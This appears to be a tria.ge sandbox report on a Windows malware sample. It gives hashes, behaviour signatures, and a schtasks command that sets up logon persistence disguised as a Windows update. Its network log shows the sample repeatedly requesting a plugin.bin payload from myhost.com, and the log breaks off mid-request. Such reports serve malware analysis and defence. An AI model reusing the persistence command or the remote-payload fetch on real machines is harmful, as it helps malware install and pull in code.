Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

6

Static

static

3

62b12477a3...18.exe

windows7-x64

6

62b12477a3...18.exe

windows10-2004-x64

6

Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21/05/2024, 08:44 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe

  • Size

    476KB

  • MD5

    62b12477a3468dc789f91d8fd9e2ba8e

  • SHA1

    5f681b5b7d9432215b593c2f7d3131175dec3da5

  • SHA256

    c92352d38a526cf8d4e5a1ea0c118a37dd0c5abab846086f7fc760fbc9e54ed6

  • SHA512

    3a89228bd1f3d6ab6b01788d191101d7e5984696fcead5e9a5a67560a033a93cd28e90de44811951a072a13761c02a82aed2b78370ff6a801a67123e4d86e787

  • SSDEEP

    6144:4ThBhkx6m6yfxIaf0hqRdexsQGb7Lu7tiJ0QBj3jVQ4LATJwPrLxvvqrGiJLSZQ:AnCJu7sZjVQ4LwqPLw

Score
6/10
persistence

Malware Config

Signatures

  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Drops file in Windows directory 1 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe"
    1⤵
    • Adds Run key to start application
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3952
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /delete /tn WindowsUpdate555F1D06
      2⤵
        PID:4340
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /sc ONLOGON /tn WindowsUpdate555F1D06 /tr "C:\Users\Admin\AppData\Roaming\555F1D06\iexplorer.exe" /RL HIGHEST
        2⤵
        • Creates scheduled task(s)
        PID:1048

    Network

    • flag-us
      DNS
      149.220.183.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      149.220.183.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      79.190.18.2.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      79.190.18.2.in-addr.arpa
      IN PTR
      Response
      79.190.18.2.in-addr.arpa
      IN PTR
      a2-18-190-79deploystaticakamaitechnologiescom
    • flag-us
      DNS
      g.bing.com
      Remote address:
      8.8.8.8:53
      Request
      g.bing.com
      IN A
      Response
      g.bing.com
      IN CNAME
      g-bing-com.dual-a-0034.a-msedge.net
      g-bing-com.dual-a-0034.a-msedge.net
      IN CNAME
      dual-a-0034.a-msedge.net
      dual-a-0034.a-msedge.net
      IN A
      204.79.197.237
      dual-a-0034.a-msedge.net
      IN A
      13.107.21.237
    • flag-us
      GET
      https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8zEYtp3n2ejf6nXzvuu0pPTVUCUx9YVemVS4C4odpuQqt_KEvSsZf0QB8Noc_TPglXF9UV5fAM9BKX7x3Bm30ZsrOIKG3G6rwG4rzV4njhGICbwot-nCwVZUVLq0lUMy-etQ-CQaLjGBNpy3Kui-OYcLdJiLFHYIuvaBZroBC2AmL3R19%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy54Ym94LmNvbSUyZmdhbWVzJTJmY2FsbC1vZi1kdXR5LW1vZGVybi13YXJmYXJlLWlpaSUzZm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX0NvRCUyNmZvcm0lM2RNNTAwNlg%26rlid%3D3a30a7be17ed16d6b6ddc195a7e06bd5&TIME=20240426T134616Z&CID=531035994&EID=531035994&tids=15000&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644&muid=3EBA0D95A4930C635584F13F751694E4
      Remote address:
      204.79.197.237:443
      Request
      GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8zEYtp3n2ejf6nXzvuu0pPTVUCUx9YVemVS4C4odpuQqt_KEvSsZf0QB8Noc_TPglXF9UV5fAM9BKX7x3Bm30ZsrOIKG3G6rwG4rzV4njhGICbwot-nCwVZUVLq0lUMy-etQ-CQaLjGBNpy3Kui-OYcLdJiLFHYIuvaBZroBC2AmL3R19%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy54Ym94LmNvbSUyZmdhbWVzJTJmY2FsbC1vZi1kdXR5LW1vZGVybi13YXJmYXJlLWlpaSUzZm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX0NvRCUyNmZvcm0lM2RNNTAwNlg%26rlid%3D3a30a7be17ed16d6b6ddc195a7e06bd5&TIME=20240426T134616Z&CID=531035994&EID=531035994&tids=15000&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644&muid=3EBA0D95A4930C635584F13F751694E4 HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      set-cookie: MUID=22D01999A73B60921EDC0D1FA6DB61AE; domain=.bing.com; expires=Sun, 15-Jun-2025 08:56:45 GMT; path=/; SameSite=None; Secure; Priority=High;
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: D739FF5C25D540AAB94AC25C43E2D770 Ref B: LON04EDGE1120 Ref C: 2024-05-21T08:56:45Z
      date: Tue, 21 May 2024 08:56:45 GMT
    • flag-us
      GET
      https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8zEYtp3n2ejf6nXzvuu0pPTVUCUx9YVemVS4C4odpuQqt_KEvSsZf0QB8Noc_TPglXF9UV5fAM9BKX7x3Bm30ZsrOIKG3G6rwG4rzV4njhGICbwot-nCwVZUVLq0lUMy-etQ-CQaLjGBNpy3Kui-OYcLdJiLFHYIuvaBZroBC2AmL3R19%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy54Ym94LmNvbSUyZmdhbWVzJTJmY2FsbC1vZi1kdXR5LW1vZGVybi13YXJmYXJlLWlpaSUzZm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX0NvRCUyNmZvcm0lM2RNNTAwNlg%26rlid%3D3a30a7be17ed16d6b6ddc195a7e06bd5&TIME=20240426T134616Z&CID=531035994&EID=&tids=15000&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644&muid=3EBA0D95A4930C635584F13F751694E4
      Remote address:
      204.79.197.237:443
      Request
      GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8zEYtp3n2ejf6nXzvuu0pPTVUCUx9YVemVS4C4odpuQqt_KEvSsZf0QB8Noc_TPglXF9UV5fAM9BKX7x3Bm30ZsrOIKG3G6rwG4rzV4njhGICbwot-nCwVZUVLq0lUMy-etQ-CQaLjGBNpy3Kui-OYcLdJiLFHYIuvaBZroBC2AmL3R19%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy54Ym94LmNvbSUyZmdhbWVzJTJmY2FsbC1vZi1kdXR5LW1vZGVybi13YXJmYXJlLWlpaSUzZm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX0NvRCUyNmZvcm0lM2RNNTAwNlg%26rlid%3D3a30a7be17ed16d6b6ddc195a7e06bd5&TIME=20240426T134616Z&CID=531035994&EID=&tids=15000&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644&muid=3EBA0D95A4930C635584F13F751694E4 HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      cookie: MUID=22D01999A73B60921EDC0D1FA6DB61AE; _EDGE_S=SID=15E414C716BB6C513F93004117116D18
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      set-cookie: MSPTC=pd-s9F2fsinPlw2_r2qFjdZQuFbaB_FU2SNzi-EFD6k; domain=.bing.com; expires=Sun, 15-Jun-2025 08:56:46 GMT; path=/; Partitioned; secure; SameSite=None
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: EE6EB70CA8AE4981A3FEE0E24B49B92B Ref B: LON04EDGE1120 Ref C: 2024-05-21T08:56:46Z
      date: Tue, 21 May 2024 08:56:45 GMT
    • flag-nl
      GET
      https://www.bing.com/aes/c.gif?RG=427c8da424ad4e679959a38f7a336e93&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T134616Z&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644
      Remote address:
      23.62.61.129:443
      Request
      GET /aes/c.gif?RG=427c8da424ad4e679959a38f7a336e93&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T134616Z&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644 HTTP/2.0
      host: www.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      cookie: MUID=22D01999A73B60921EDC0D1FA6DB61AE
      Response
      HTTP/2.0 200
      cache-control: private,no-store
      pragma: no-cache
      vary: Origin
      p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: D5CEBA0B16DB4B6F8FE94D6F4B99A655 Ref B: DUS30EDGE0720 Ref C: 2024-05-21T08:56:45Z
      content-length: 0
      date: Tue, 21 May 2024 08:56:45 GMT
      set-cookie: _EDGE_S=SID=15E414C716BB6C513F93004117116D18; path=/; httponly; domain=bing.com
      set-cookie: MUIDB=22D01999A73B60921EDC0D1FA6DB61AE; path=/; httponly; expires=Sun, 15-Jun-2025 08:56:45 GMT
      alt-svc: h3=":443"; ma=93600
      x-cdn-traceid: 0.7d3d3e17.1716281805.142977a1
    • flag-us
      DNS
      95.221.229.192.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      95.221.229.192.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      237.197.79.204.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      237.197.79.204.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      133.32.126.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      133.32.126.40.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      129.61.62.23.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      129.61.62.23.in-addr.arpa
      IN PTR
      Response
      129.61.62.23.in-addr.arpa
      IN PTR
      a23-62-61-129deploystaticakamaitechnologiescom
    • flag-nl
      GET
      https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90
      Remote address:
      23.62.61.129:443
      Request
      GET /th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90 HTTP/2.0
      host: www.bing.com
      accept: */*
      cookie: MUID=22D01999A73B60921EDC0D1FA6DB61AE; _EDGE_S=SID=15E414C716BB6C513F93004117116D18; MSPTC=pd-s9F2fsinPlw2_r2qFjdZQuFbaB_FU2SNzi-EFD6k; MUIDB=22D01999A73B60921EDC0D1FA6DB61AE
      accept-encoding: gzip, deflate, br
      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
      Response
      HTTP/2.0 200
      cache-control: public, max-age=2592000
      content-type: image/png
      access-control-allow-origin: *
      access-control-allow-headers: *
      access-control-allow-methods: GET, POST, OPTIONS
      timing-allow-origin: *
      report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
      nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
      content-length: 1107
      date: Tue, 21 May 2024 08:56:47 GMT
      alt-svc: h3=":443"; ma=93600
      x-cdn-traceid: 0.7d3d3e17.1716281807.14297d8c
    • flag-us
      DNS
      58.99.105.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      58.99.105.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      vpsrdp.publicvm.com
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      8.8.8.8:53
      Request
      vpsrdp.publicvm.com
      IN A
      Response
      vpsrdp.publicvm.com
      IN CNAME
      publicvm.com
      publicvm.com
      IN A
      139.99.66.103
    • flag-us
      DNS
      myhost.com
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      8.8.8.8:53
      Request
      myhost.com
      IN A
      Response
      myhost.com
      IN A
      172.67.177.125
      myhost.com
      IN A
      104.21.75.144
    • flag-us
      GET
      http://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:80
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 301 Moved Permanently
      Date: Tue, 21 May 2024 08:56:54 GMT
      Content-Type: text/html
      Content-Length: 167
      Connection: keep-alive
      Cache-Control: max-age=3600
      Expires: Tue, 21 May 2024 09:56:54 GMT
      Location: https://myhost.com/plugin.bin
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dbSZ3Y6G9TKoJn9OkJVXGxvPFhHPmq3yo0TuAAghJeN6%2ByHJRFR8AMc%2F4QKD30B%2FzEadJxDECHq8wcMw8OAZ1q765yCWH%2BarmcAeWVFNft%2B9ynalVVs6T8t4Twzq"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Vary: Accept-Encoding
      Server: cloudflare
      CF-RAY: 88735b1b6f244599-LHR
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Connection: Keep-Alive
      Host: myhost.com
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:56:55 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: MISS
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SsslE3qzHSTn0IRyxVMVUHuQD%2F1xNlZ3UHjBja9DCLFExhK8ZtQkz%2F8%2BB%2BOzEhLNx5TgdcnKlk1mTMsFo%2BpzQgQP7nHilTiiq5P8D6TJejNsQrCh%2Br7%2BrtJj5Khg"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735b1e88ae9493-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      DNS
      125.177.67.172.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      125.177.67.172.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      67.169.217.172.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      67.169.217.172.in-addr.arpa
      IN PTR
      Response
      67.169.217.172.in-addr.arpa
      IN PTR
      lhr48s09-in-f31e100net
    • flag-us
      DNS
      154.239.44.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      154.239.44.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:56:56 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: MISS
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KKM3xqy%2BPWRSCujlf%2BM00G%2FV4XijTpgwqVEU4E00UOcRSmg3ORibyHdAGHoaJVOibxhl8JG0bKNrQDCJTW1Bm9FOD2edYi0%2FNdSkNE5PgaaDO6vow8QGyMcf1jxm"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735b260f9f4083-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:56:58 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: MISS
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t7dk5%2BxbzqsN2UbJR5fyxcw6J1mcCLvngJ%2B56BmNx%2BIWNiQ0qU%2FBGi%2FfgIiA1d1Id10yFVNbG9%2BPQ%2BORDrY64C2vXZ9xufmpEO%2B9K67fjr0XEE9bGtTco%2FkBCKs2"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735b2d1b5b8885-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:57:00 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: MISS
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FUqb4w80J1OhLn9jD7%2Fo3VP6RLWt0BvPz4ruRrgnvR43Qopql5%2B1obdPd1S8P5HciI22yI9SISQb%2BfEGbDZstTPMkMlAaOAash7HTQVWLCU45IklnCJDVNjUDSy8"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735b3aaa566409-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:57:01 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iHi6mQRTuVBESCM4wvAZEwdz7%2BodYGRCSdgwqrdA%2FkzJ2CFxBsWmM0NaAu266FTLWMgiKZGYnNx8kNJXH3jvnJRAK3HU%2BkLH7Jg%2FyEGKmLUMP2%2F02mJ6uP5EQKrQ"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735b421e7f63ef-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:57:02 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JQApBiBft4j4OxGsgL9RYfVR0Wl8k%2Bu02K2gRuYgv92sKOfTAhy5IpxQ7LOx%2FqNrPUN75C1nkL2NeUKspsS6ALaBp5QQuqWdH2Qs35DOhY7caUQrhC2ztqpLYM6u"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735b47cd5a6544-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:57:03 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8dlIozU25YOZOrbic1VtllfsbR4pgsmJpyuFS6jWLiH0ml8zQaFowMZN8eUwyT8QbBcVn003N6CgnOTiTys2s1AAe7epBII0s3Y8K2mI%2B1aYfSxqd6H3BuT4T8lc"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735b4d4d706525-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:57:04 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c3h7%2FU77E1mnkUF89IA5HvLqOg2K23JdJZVdnR1AYMKAuiybNmaZLEOnlFQT%2FcmiluemjWk0JYRFSbz%2Fv%2BugQDxJHCCJjGCQ83hPv4YFvZc%2FnfYP9%2BU9zE6PX4YK"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735b52ce6006dd-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
